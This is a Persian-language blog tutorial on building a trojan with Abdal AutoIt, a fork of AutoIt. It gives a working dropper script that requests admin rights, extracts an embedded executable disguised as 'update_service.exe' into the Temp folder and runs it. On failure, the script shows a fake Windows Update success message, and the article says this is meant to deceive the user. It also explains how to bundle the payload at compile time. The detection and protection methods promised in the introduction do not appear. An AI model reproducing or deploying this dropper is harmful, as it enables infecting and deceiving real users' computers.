آموزش ساخت تروجان با Abdal AutoIt

این مقاله آموزشی نحوه ساخت تروجان با Abdal AutoIt را بررسی کرده و روش‌های اجرای فایل مخرب، دور زدن آنتی‌ویروس‌ها و شناسایی آن را توضیح می‌دهد...

انتشار: , زمان مطالعه: 5 دقیقه
آموزش ساخت تروجان با Abdal AutoIt
دسته بندی: امنیت سایبری تعداد بازدید: 133

Abdal AutoIt یک نسخه انشعاب گرفته شده بر پایه AutoIt است که توسط تیم امنیتی ابدال توسعه یافته است. این نسخه شامل قابلیت‌هایی است که برای توسعه اسکریپت‌های مخفی و بدافزارهای سفارشی مورد استفاده قرار می‌گیرد. در این مقاله، نحوه ایجاد یک تروجان ساده با Abdal AutoIt را بررسی کرده و سپس روش‌های محافظتی را معرفی خواهیم کرد.

ساخت یک تروجان ساده با Abdal AutoIt

 نوشتن اسکریپت مخرب

این کد وظیفه دارد که یک فایل اجرایی مخرب را در یک مسیر موقت (Temp) ذخیره و اجرا کند. همچنین، در صورت عدم موفقیت در ذخیره یا اجرا، یک پیام جعلی به کاربر نمایش می‌دهد تا شک نکند.

#RequireAdmin
; -------------------------------------------------------------------
; Programmer       : Ebrahim Shafiei (EbraSha)
; Email                     : [email protected]
; -------------------------------------------------------------------

; Get the Temp directory
$tempDir = @TempDir

; Define the destination path for the embedded executable
$destFile = $tempDir & "\update_service.exe"

; Extract the embedded file to the Temp directory
FileInstall("update_service.exe", $destFile, 1)

; Check if the file exists before executing
If FileExists($destFile) Then
    Run($destFile) ; Run the executable
Else
    MsgBox(64, "Windows Update", "The latest security update has been applied successfully.")
EndIf

توضیح کد:

#RequireAdmin
  • این خط تعیین می‌کند که اسکریپت نیاز به اجرای با دسترسی ادمین (Administrator Privileges) دارد.
  • این کار باعث می‌شود که کد بتواند بدون محدودیت روی سیستم اجرا شود.

تعیین مسیر ذخیره فایل مخرب

$tempDir = @TempDir
$destFile = $tempDir & "\update_service.exe"

متغیر $tempDir مقدار مسیر پوشه موقت ویندوز (Temp Directory) را دریافت می‌کند.

معمولاً این مسیر برابر است با:

C:\Users\%USERNAME%\AppData\Local\Temp

$destFile شامل مسیر کامل فایلی است که قرار است در Temp ذخیره شود.در این مثال:

C:\Users\%USERNAME%\AppData\Local\Temp\update_service.exe

ذخیره فایل مخرب در سیستم با FileInstall

FileInstall("update_service.exe", $destFile, 1)

FileInstall چیست و چگونه کار می‌کند؟

  • FileInstall در AutoIt فایل را از داخل اسکریپت به یک مسیر مشخص در سیستم کاربر کپی می‌کند.
  • "update_service.exe":
    • این نام فایل اجرایی مخرب است که باید در کنار فایل .au3 هنگام کامپایل قرار بگیرد.
    • یعنی باید در همان پوشه‌ای باشد که اسکریپت AutoIt شما اجرا می‌شود.
  • $destFile:
    • مسیر مقصد که فایل در آنجا ذخیره خواهد شد.
  • عدد 1 در FileInstall:
    • اگر مقدار 1 باشد، اگر فایلی با همین نام وجود داشته باشد، فایل قدیمی را جایگزین می‌کند.
    • اگر مقدار 0 باشد، فقط در صورتی فایل را کپی می‌کند که نسخه‌ای از آن در مسیر مقصد وجود نداشته باشد.

🔴 مهم: این دستور فقط زمانی کار می‌کند که اسکریپت شما به یک فایل اجرایی .exe کامپایل شده باشد. در حالت اسکریپت .au3، FileInstall کار نمی‌کند.

بررسی ذخیره و اجرای فایل

If FileExists($destFile) Then
    Run($destFile) ; Run the executable
Else
    MsgBox(64, "Windows Update", "The latest security update has been applied successfully.")
EndIf

عملکرد این بخش:

  1. بررسی می‌شود که آیا فایل update_service.exe در مسیر مقصد ذخیره شده است یا نه.
    • اگر فایل موجود باشد، آن را با Run($destFile) اجرا می‌کند.
  2. اگر فایل ذخیره نشده باشد (به دلیل مشکل در FileInstall یا حذف شدن توسط آنتی‌ویروس)، یک پیام جعلی نمایش داده می‌شود.
    • MsgBox(64, "Windows Update", "...") یک پیام غیرمشکوک را نشان می‌دهد تا کاربر به خطا شک نکند.

دلیل استفاده از پیغام The latest security update has been applied successfully در نرم افزار  این است که به جای نمایش یک پیام خطا که ممکن است شک‌برانگیز باشد، از یک پیام جعلی و فریبنده استفاده شده است.

کاربر پس از مشاهده این پیام فکر می‌کند که همه چیز به‌درستی کار کرده و هیچ مشکلی وجود ندارد، درحالی‌که فایل موردنظر اجرا نشده است. این تکنیک معمولاً در بدافزارها برای پنهان کردن نقص در اجرای مخرب استفاده می‌شود تا کاربر به بررسی بیشتر سیستم نپردازد.

کجا باید فایل مخرب را قرار دهیم؟

  • شما باید فایل مخرب (update_service.exe) را در همان پوشه‌ای که اسکریپت .au3 شما قرار دارد، بگذارید.
  • وقتی کد کامپایل شود، FileInstall این فایل را درون اسکریپت قرار داده و هنگام اجرا آن را استخراج خواهد کرد.

🔴 مثال: اگر فایل AutoIt شما در مسیر زیر باشد:

C:\MyProject\script.au3

فایل مخرب باید دقیقاً در همان پوشه قرار بگیرد:

C:\MyProject\update_service.exe

پس از کامپایل شدن script.au3 به script.exe، فایل update_service.exe در هنگام اجرا در مسیر Temp ذخیره و اجرا خواهد شد.

🚨 هشدار: این مقاله صرفاً برای اهداف آموزشی و تست امنیت سیستم‌های شخصی است. هرگونه استفاده غیرقانونی از آن بر عهده فرد استفاده‌کننده خواهد بود.

دیدگاه های مربوط به این مقاله (برای ارسال دیدگاه در سایت حتما باید عضو باشید و پروفایل کاربری شما تکمیل شده باشد)